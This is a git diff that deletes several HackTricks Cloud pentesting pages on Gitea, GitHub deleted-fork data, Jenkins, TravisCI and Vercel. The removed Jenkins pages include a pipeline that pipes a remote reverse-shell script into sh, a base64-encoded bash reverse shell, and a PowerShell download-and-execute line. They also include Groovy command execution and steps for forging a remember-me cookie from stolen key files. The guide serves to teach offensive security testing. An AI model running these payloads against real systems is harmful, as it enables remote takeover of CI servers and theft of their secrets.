There are **3** possible **roles**: - -* Administrator -* Write -* Read - -## Gitea Authentication - -### Web Access - -Using **username + password** and potentially (and recommended) a 2FA. - -### **SSH Keys** - -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) - -#### **GPG Keys** - -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. - -### **Personal Access Tokens** - -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) - -### Oauth Applications - -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: - -![](<../../.gitbook/assets/image (194).png>) - -### Deploy keys - -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. - -## Branch Protections - -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. - -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ - -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. 
-{% endhint %} - -Different protections can be applied to a branch (like to master): - -* **Disable Push**: No-one can push to this branch -* **Enable Push**: Anyone with access can push, but not force push. -* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -* **Enable Status checks:** Require status checks to pass before merging. -* **Require approvals**: Indicate the number of approvals required before a PR can be merged. -* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -* **Block merge on official review requests**: If there official review requests it cannot be merged -* **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -* **Require Signed Commits**: Commits must be signed. -* **Block merge if pull request is outdated** -* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes - -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
deleted file mode 100644
index 392386866..000000000
--- a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# Accessible Deleted Data in Github
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). - -## Accessing Deleted Fork Data - -1. You fork a public repository -2. You commit code to your fork -3. You delete your fork - -{% hint style="danger" %} -The data commited in the deleted fork is still accessible. -{% endhint %} - -## Accessing Deleted Repo Data - -1. You have a public repo on GitHub. -2. A user forks your repo. -3. You commit data after they fork it (and they never sync their fork with your updates). -4. You delete the entire repo. - -{% hint style="danger" %} -Even if you deleted your repo, all the changes made to it are still accessible through the forks. -{% endhint %} - -## Accessing Private Repo Data - -1. You create a private repo that will eventually be made public. -2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public. -3. You make your “upstream” repository public and keep your fork private. - -{% hint style="danger" %} -It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. 
-{% endhint %} - -## How to discover commits from deleted/hidden forks - -The same blog post propose 2 options: - -### Directly accessing the commit - -If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/` - -### Brute-forcing short SHA-1 values - -It's the same to access both of these: - -* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14) -* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463) - -And the latest one use a short sha-1 that is bruteforceable. - -## References - -* [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
deleted file mode 100644
index 06ae83621..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ /dev/null
@@ -1,135 +0,0 @@
-# Jenkins Arbitrary File Read to RCE via "Remember Me"
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) - -This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: - -### Attack Prerequisites - -* **Feature Requirement:** "Remember me" must be enabled (default setting). -* **Access Levels:** Attacker needs Overall/Read permissions. -* **Secret Access:** Ability to read both binary and textual content from key files. - -### Detailed Exploitation Process - -#### Step 1: Data Collection - -**User Information Retrieval** - -* Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: - * **Username** - * **User seed** - * **Timestamp** - * **Password hash** - -**Secret Key Extraction** - -* Extract cryptographic keys used for signing the cookie: - * **Secret Key:** `$JENKINS_HOME/secret.key` - * **Master Key:** `$JENKINS_HOME/secrets/master.key` - * **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` - -#### Step 2: Cookie Forging - -**Token Preparation** - -* **Calculate Token Expiry Time:** - - {% code overflow="wrap" %} - ```javascript - tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time - ``` - {% endcode %} -* **Concatenate Data for Token:** - - {% code overflow="wrap" %} - ```javascript - token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey - ``` - {% endcode %} - -**MAC Key Decryption** - -* **Decrypt MAC Key File:** - - ```javascript - key = toAes128Key(masterKey) // Convert master key to AES128 key format - decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file - if not 
decrypted.hasSuffix("::::MAGIC::::") - return ERROR; - macKey = decrypted.withoutSuffix("::::MAGIC::::") - ``` - -**Signature Computation** - -* **Compute HMAC SHA256:** - - ```javascript - mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key - tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string - ``` - -**Cookie Encoding** - -* **Generate Final Cookie:** - - {% code overflow="wrap" %} - ```javascript - cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature) // Base64 encode the cookie data - ``` - {% endcode %} - -#### Step 3: Code Execution - -**Session Authentication** - -* **Fetch CSRF and Session Tokens:** - * Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. - * Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. - -**Command Execution Request** - -* **Send a POST Request with Groovy Script:** - - ```bash - curl -X POST "$JENKINS_URL/scriptText" \ - --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ - --header "Jenkins-Crumb: $CRUMB" \ - --header "Content-Type: application/x-www-form-urlencoded" \ - --data-urlencode "script=$SCRIPT" - ``` - - * Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. - -The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
deleted file mode 100644
index 34044c311..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# Jenkins RCE Creating/Modifying Pipeline
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Creating a new Pipeline
-
-In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
-
-![](<../../.gitbook/assets/image (235).png>)
-
-In the **Pipeline section** write the **reverse shell**:
-
-![](<../../.gitbook/assets/image (285).png>)
-
-```groovy
-pipeline {
- agent any
-
- stages {
- stage('Hello') {
- steps {
- sh '''
- curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
- '''
- }
- }
- }
-}
-```
-
-Finally click on **Save**, and **Build Now** and the pipeline will be executed:
-
-![](<../../.gitbook/assets/image (228).png>)
-
-## Modifying a Pipeline
-
-If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
deleted file mode 100644
index b11c7dcb3..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ /dev/null
@@ -1,62 +0,0 @@
-# Jenkins RCE Creating/Modifying Project
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Creating a Project
-
-This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
-
-1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
-2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
-3. Click **Build now**
- 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
- 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`**
-
-![](<../../.gitbook/assets/image (165).png>)
-
-## Modifying a Project
-
-Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
-
-![](<../../.gitbook/assets/image (265).png>)
-
-If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
-
-Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
-
-## Execution
-
-If you are allowed to configure the project you can **make it execute commands when a build is successful**:
-
-![](<../../.gitbook/assets/image (98).png>)
-
-Click on **Save** and **build** the project and your **command will be executed**.\
-If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
deleted file mode 100644
index 786f87325..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ /dev/null
@@ -1,89 +0,0 @@
-# Jenkins RCE with Groovy Script
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Jenkins RCE with Groovy Script
-
-This is less noisy than creating a new project in Jenkins
-
-1. Go to _path\_jenkins/script_
-2. Inside the text box introduce the script
-
-```python
-def process = "PowerShell.exe ".execute()
-println "Found text ${process.text}"
-```
-
-You could execute a command using: `cmd.exe /c dir`
-
-In **linux** you can do: **`"ls /".execute().text`**
-
-If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
-
-**Another useful groovy script** is (replace \[INSERT COMMAND]):
-
-```python
-def sout = new StringBuffer(), serr = new StringBuffer()
-def proc = '[INSERT COMMAND]'.execute()
-proc.consumeProcessOutput(sout, serr)
-proc.waitForOrKill(1000)
-println "out> $sout err> $serr"
-```
-
-### Reverse shell in linux
-
-```python
-def sout = new StringBuffer(), serr = new StringBuffer()
-def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
-proc.consumeProcessOutput(sout, serr)
-proc.waitForOrKill(1000)
-println "out> $sout err> $serr"
-```
-
-### Reverse shell in windows
-
-You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
-
-```python
-scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
-echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
-cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc
-```
-
-### Script
-
-You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
-
-You can use MSF to get a reverse shell:
-
-```
-msf> use exploit/multi/http/jenkins_script_console
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/todo.md b/pentesting-ci-cd/todo.md
deleted file mode 100644
index 716bbecf1..000000000
--- a/pentesting-ci-cd/todo.md
+++ /dev/null
@@ -1,42 +0,0 @@
-# TODO
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
-
-* Drone
-* TeamCity
-* BuildKite
-* OctopusDeploy
-* Rancher
-* Mesosphere
-* Radicle
-* Any other CI/CD platform...
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md
deleted file mode 100644
index 9d14e9703..000000000
--- a/pentesting-ci-cd/travisci-security/README.md
+++ /dev/null
@@ -1,92 +0,0 @@
-# TravisCI Security
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## What is TravisCI
-
-**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
-
-{% content-ref url="basic-travisci-information.md" %}
-[basic-travisci-information.md](basic-travisci-information.md)
-{% endcontent-ref %}
-
-## Attacks
-
-### Triggers
-
-To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
-
-![](<../../.gitbook/assets/image (145).png>)
-
-#### Cron Jobs
-
-If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
-
-![](<../../.gitbook/assets/image (243).png>)
-
-{% hint style="info" %}
-It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
-{% endhint %}
-
-### Third Party PR
-
-TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
-
-![](<../../.gitbook/assets/image (208).png>)
-
-### Dumping Secrets
-
-As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
-
-* To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
-* To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
-* To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
-
-![](<../../.gitbook/assets/image (81).png>)
-
-### TODO:
-
-* Example build with reverse shell running on Windows/Mac/Linux
-* Example build leaking the env base64 encoded in the logs
-
-### TravisCI Enterprise
-
-If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
-
-* escape to the host?
-* compromise kubernetes?
-* compromise other machines running in the same network?
-* compromise new cloud credentials?
-
-## References
-
-* [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
-* [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/vercel-security.md b/pentesting-ci-cd/vercel-security.md
deleted file mode 100644
index f46ad4fb1..000000000
--- a/pentesting-ci-cd/vercel-security.md
+++ /dev/null
@@ -1,463 +0,0 @@
-# Vercel
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**.
-
-For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also).
-
-## Project Settings
-
-### General
-
-**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
-
-#### Security Configurations:
-
-* **Transfer**
- * **Misconfiguration:** Allows to transfer the project to another team
- * **Risk:** An attacker could steal the project
-* **Delete Project**
- * **Misconfiguration:** Allows to delete the project
- * **Risk:** Delete the prject
-
-***
-
-### Domains
-
-**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
-
-#### Security Configurations:
-
-* **DNS Configuration Errors**
- * **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
- * **Risk:** Domain hijacking, traffic interception, and phishing attacks.
-* **SSL/TLS Certificate Management**
- * **Misconfiguration:** Using weak or expired SSL/TLS certificates.
- * **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
-* **DNSSEC Implementation**
- * **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
- * **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
-* **Environment used per domain**
